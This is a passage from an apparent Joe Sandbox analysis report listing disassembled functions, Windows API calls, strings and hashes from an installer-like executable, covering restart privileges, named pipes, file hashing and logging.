                                                            • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                            • API String ID: 1357844191-2832335422
                                                            • Opcode ID: e7f6bcd1f041f722cfe55919ec2631c28d4857451d36cd9e70e78f554e41e933
                                                            • Instruction ID: 16be6ac8c5c4b59a9928d660667e1b189dc9175ff42a630d156890da3fed8ee5
                                                            • Opcode Fuzzy Hash: e7f6bcd1f041f722cfe55919ec2631c28d4857451d36cd9e70e78f554e41e933
                                                            • Instruction Fuzzy Hash: 73C1E371600656BFDF15AF68C891F6A77A9FF08310B098129F919EB341DB72EC009BA1
                                                            Function 008745EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00874617
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0087461E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00874628
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00874678
                                                            • GetLastError.KERNEL32 ref: 00874682
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 008746C6
                                                            • GetLastError.KERNEL32 ref: 008746D0
                                                            • Sleep.KERNEL32(000003E8), ref: 0087470C
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0087471D
                                                            • GetLastError.KERNEL32 ref: 00874727
                                                            • CloseHandle.KERNEL32(?), ref: 0087477D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                            • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                            • API String ID: 2241679041-1583736410
                                                            • Opcode ID: a2f386b59062f2a17db4822dcf996d679904b2a74bea14afb77eed0967b34975
                                                            • Instruction ID: 77185b7e09c5a989cba1914adf538024ceda31374e33204a08e463a4e16ad50d
                                                            • Opcode Fuzzy Hash: a2f386b59062f2a17db4822dcf996d679904b2a74bea14afb77eed0967b34975
                                                            • Instruction Fuzzy Hash: 0041EB73A40639ABE720ABA98C86B7F7B58FB01751F114225FE15F7394E7A5CC0085E2
                                                            Function 00884EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00884F0D
                                                            • GetLastError.KERNEL32(?,00000000,?,?,0087452F,?), ref: 00884F16
                                                            • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0087452F,?), ref: 00884FB8
                                                            • GetLastError.KERNEL32(?,0087452F,?), ref: 00884FC5
                                                            • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0087452F), ref: 00885040
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087452F,?), ref: 0088504B
                                                            • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0087452F,?), ref: 0088508B
                                                            • LocalFree.KERNEL32(00000000,?,0087452F,?), ref: 008850B9
                                                            Strings
                                                            • Failed to create the security descriptor for the connection event and pipe., xrefs: 00884F44
                                                            • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00884F08
                                                            • Failed to allocate full name of cache pipe: %ls, xrefs: 00885022
                                                            • pipe.cpp, xrefs: 00884F3A, 00884FE9, 0088506F
                                                            • Failed to create pipe: %ls, xrefs: 00884FF6, 0088507C
                                                            • \\.\pipe\%ls, xrefs: 00884F6E
                                                            • \\.\pipe\%ls.Cache, xrefs: 0088500C
                                                            • Failed to allocate full name of pipe: %ls, xrefs: 00884F84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                            • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                            • API String ID: 1214480349-3253666091
                                                            • Opcode ID: f4efeecad2bcb591f3416c7163d03e266a6bdd9b636295aa8d63e2a655c0101e
                                                            • Instruction ID: f04a64404d5d440dcfe7eeb55c5ed07c32c698e56255e6e2c574aad2e32c9d43
                                                            • Opcode Fuzzy Hash: f4efeecad2bcb591f3416c7163d03e266a6bdd9b636295aa8d63e2a655c0101e
                                                            • Instruction Fuzzy Hash: 4A519872D41A26BBDB21ABA48C46F9EBB74FF04710F114225FE10F6290D7B59E809BD1
                                                            Function 008AFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 008AFAC7
                                                            • GetLastError.KERNEL32 ref: 008AFAD1
                                                            • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 008AFB0E
                                                            • GetLastError.KERNEL32 ref: 008AFB18
                                                            • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 008AFB5F
                                                            • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 008AFB83
                                                            • GetLastError.KERNEL32 ref: 008AFB8D
                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 008AFBCA
                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 008AFBE1
                                                            • GetLastError.KERNEL32 ref: 008AFBFC
                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 008AFC34
                                                            • GetLastError.KERNEL32 ref: 008AFC3E
                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 008AFC77
                                                            • GetLastError.KERNEL32 ref: 008AFC85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                            • String ID: cryputil.cpp
                                                            • API String ID: 3955742341-2185294990
                                                            • Opcode ID: eb48b52563b0e5e290d2daf78c051f5360279b25ff88b61e555546a3f31b69f0
                                                            • Instruction ID: bb5e23467f689e9bbac20ea6d0dee06651c7a102110557526aa333743235902a
                                                            • Opcode Fuzzy Hash: eb48b52563b0e5e290d2daf78c051f5360279b25ff88b61e555546a3f31b69f0
                                                            • Instruction Fuzzy Hash: E351E437D40239ABEB319A95CC04BEA7B74FB05761F0141B5BF48FA551E3B49D818AE0
                                                            Function 00889E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • moving, xrefs: 0088A029
                                                            • Failed to create unverified path., xrefs: 00889F6E
                                                            • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00889FA4
                                                            • copying, xrefs: 0088A030, 0088A038
                                                            • Failed to move verified file to complete payload path: %ls, xrefs: 0088A06C
                                                            • Failed to concat complete cached path., xrefs: 00889EF4
                                                            • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00889FF1
                                                            • Failed to get cached path for package with cache id: %ls, xrefs: 00889EC8
                                                            • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00889FCB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                            • API String ID: 0-1289240508
                                                            • Opcode ID: 7e62836f9770f716524acd74e4c13ad92feae07095ff32632443dbf032514486
                                                            • Instruction ID: 459e4d260c7fb5096f22abd1b46af46de1bc536c0edabbc579066bb2105b14bc
                                                            • Opcode Fuzzy Hash: 7e62836f9770f716524acd74e4c13ad92feae07095ff32632443dbf032514486
                                                            • Instruction Fuzzy Hash: 24516E3194051AFADF227A98CC02FED7B76FF14710F144162FA00F52A1E7729E60AB86
                                                            Function 008762AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(0000011C), ref: 008762F8
                                                            • GetLastError.KERNEL32 ref: 00876302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVersion
                                                            • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 305913169-1971907631
                                                            • Opcode ID: ff307d6581cb8cd8853546d4a13ea79192ff7559825316d7f1d666eda7f54854
                                                            • Instruction ID: 34d89de5149aa7ea0bf5ba934d0df66fdb35f5e154dd7422be2fe3a535bed70d
                                                            • Opcode Fuzzy Hash: ff307d6581cb8cd8853546d4a13ea79192ff7559825316d7f1d666eda7f54854
                                                            • Instruction Fuzzy Hash: 6D41B871A0062CABDB209B59CC49EEF7FB8FB45724F14419AF509E7240E670DE91CB91
                                                            Function 00876037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 00876062
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00876076
                                                            • GetLastError.KERNEL32 ref: 00876088
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008760DC
                                                            • GetLastError.KERNEL32 ref: 008760E6
                                                            Strings
                                                            • variable.cpp, xrefs: 008760A3, 00876101
                                                            • Failed to get the required buffer length for the Date., xrefs: 008760AD
                                                            • Failed to allocate the buffer for the Date., xrefs: 008760C4
                                                            • Failed to get the Date., xrefs: 0087610B
                                                            • Failed to set variant value., xrefs: 00876124
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: DateErrorFormatLast$SystemTime
                                                            • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2700948981-3682088697
                                                            • Opcode ID: 5f8c4cb0118ee517c501a779f08cc34200c5cbe87e7f47ba8376b41870718c00
                                                            • Instruction ID: 2d09f3a1e1c9c04e151c628e6449c08bc2fad2a70f59d4bf6ba1ab9b842c280c
                                                            • Opcode Fuzzy Hash: 5f8c4cb0118ee517c501a779f08cc34200c5cbe87e7f47ba8376b41870718c00
                                                            • Instruction Fuzzy Hash: 3931CD32A40A2ABBDB119BED8C46EEF7B64FB04710F114125FE08F7245E674DD4546E2
                                                            Function 008AFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFEF4
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFF04
                                                            • GetCurrentThreadId.KERNEL32 ref: 008AFF0D
                                                            • GetLocalTime.KERNEL32(8007139F,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008AFF23
                                                            • LeaveCriticalSection.KERNEL32(008DB5FC,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008B001A
                                                            Strings
                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 008AFFC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                            • API String ID: 296830338-59366893
                                                            • Opcode ID: a8e6c56c4d37ff55486ed51f8057efdc77151a6157a83dbb4a57069c8eb2b1e9
                                                            • Instruction ID: bb262c00dd7eeff23282947024e16790c30d03faf738c058a476400beaeeccea
                                                            • Opcode Fuzzy Hash: a8e6c56c4d37ff55486ed51f8057efdc77151a6157a83dbb4a57069c8eb2b1e9
                                                            • Instruction Fuzzy Hash: C8416D71901219EFDF219FE8D804ABFB7B8FB19B11F104226FA01E6251DB349D81DBA1
                                                            Function 00889B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00889BF2
                                                            • lstrlenW.KERNEL32(?), ref: 00889C19
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00889C79
                                                            • FindClose.KERNEL32(00000000), ref: 00889C84
                                                              • Part of subcall function 00873CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00873D40
                                                              • Part of subcall function 00873CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873D53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                            • String ID: *.*$.unverified
                                                            • API String ID: 457978746-2528915496
                                                            • Opcode ID: 96bd3606effb048e70755aa849575c53d79ccb0f7617624b171d5b7921d3267d
                                                            • Instruction ID: 5fe93df6587827b6d038b5efa34cc29f945d4590a3b41d9a25fd38603056d72f
                                                            • Opcode Fuzzy Hash: 96bd3606effb048e70755aa849575c53d79ccb0f7617624b171d5b7921d3267d
                                                            • Instruction Fuzzy Hash: 39418D3090152CAECB21BB68DD49BEAB7B9FF44301F4401A1E848F10A1EB769EC4DF15
                                                            Function 008B887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008B88D0
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008B88E2
                                                            Strings
                                                            • feclient.dll, xrefs: 008B88AA
                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008B88B9
                                                            • crypt32.dll, xrefs: 008B88A0
                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008B892D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$InformationLocalSpecificSystemZone
                                                            • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                            • API String ID: 1772835396-1985132828
                                                            • Opcode ID: ffc486ab4b55f689216c8c707092b99837be4ce68c2d2f7ab57fa1519ab99a76
                                                            • Instruction ID: f45d595a610b81df3508fcb8ab0a86f991c0ff1c1eacb33ce1eca09f58c927a5
                                                            • Opcode Fuzzy Hash: ffc486ab4b55f689216c8c707092b99837be4ce68c2d2f7ab57fa1519ab99a76
                                                            • Instruction Fuzzy Hash: 8721F8A6901128EADB60DBA9DC05EBFB3FCFB4CB11F004556F955D2180E7389A84D771
                                                            Function 008AAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 5121694defc4c7146881993143fd6efae431012550c2e068577ce7550f3387f3
                                                            • Instruction ID: 4b50e5dfdc158e19b5f2a36a54719310f3dadc6d5e8fd0510d8ec9ee26f199ef
                                                            • Opcode Fuzzy Hash: 5121694defc4c7146881993143fd6efae431012550c2e068577ce7550f3387f3
                                                            • Instruction Fuzzy Hash: 37C24A71E086288FEB29CE28DD407EAB7B5FB46315F1441EAD40DE7641E778AE818F41
                                                            Function 008761DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastNameUser
                                                            • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2054405381-1522884404
                                                            • Opcode ID: e0373eddf45c7f6aeba13c37b1e35075be49947da4910d8e38eadde63b126d96
                                                            • Instruction ID: 75fae795e55b206d9fbe9b4828969320476ff6ef099ba0ef36cb2b5c4fe429fc
                                                            • Opcode Fuzzy Hash: e0373eddf45c7f6aeba13c37b1e35075be49947da4910d8e38eadde63b126d96
                                                            • Instruction Fuzzy Hash: 6E01D632A41A29ABCB21AB58DC45EAF7BA8FF00720F114255FC18E7342EA74DD444AD6
                                                            Function 008AFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008B04F4,?,?,?,?,00000001), ref: 008AFE40
                                                            • GetLastError.KERNEL32(?,008B04F4,?,?,?,?,00000001,?,00875616,?,?,00000000,?,?,00875395,00000002), ref: 008AFE4C
                                                            • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008B04F4,?,?,?,?,00000001,?,00875616,?,?), ref: 008AFEB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID: logutil.cpp
                                                            • API String ID: 1365068426-3545173039
                                                            • Opcode ID: 414da3b3e905aea0aa9abc9e737a1c1bac17d63399ff77bde6ff5ea8cb558912
                                                            • Instruction ID: 939f523e880702ffcb100466908f236ca7a7f7d510e831a582cec8c64855296f
                                                            • Opcode Fuzzy Hash: 414da3b3e905aea0aa9abc9e737a1c1bac17d63399ff77bde6ff5ea8cb558912
                                                            • Instruction Fuzzy Hash: 8511BF32A00529EBEB21AFC48D45EAF7B69FF15710F018029FE04DA172D7718E30D6A1
                                                            Function 00896B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00896B32,00000000,00000003), ref: 00896B9F
                                                            • GetLastError.KERNEL32(?,00896B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00896F28,?), ref: 00896BA9
                                                            Strings
                                                            • msuengine.cpp, xrefs: 00896BCD
                                                            • Failed to set service start type., xrefs: 00896BD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ChangeConfigErrorLastService
                                                            • String ID: Failed to set service start type.$msuengine.cpp
                                                            • API String ID: 1456623077-1628545019
                                                            • Opcode ID: 2054689ec431f74f6f86c3ba0ccb3acc1b8724260aa6a58ec93e95e5e9087eba
                                                            • Instruction ID: 7a2b63243de1295cf3943626abe00b4f229e5f376a210a33d4e422d81c5832af
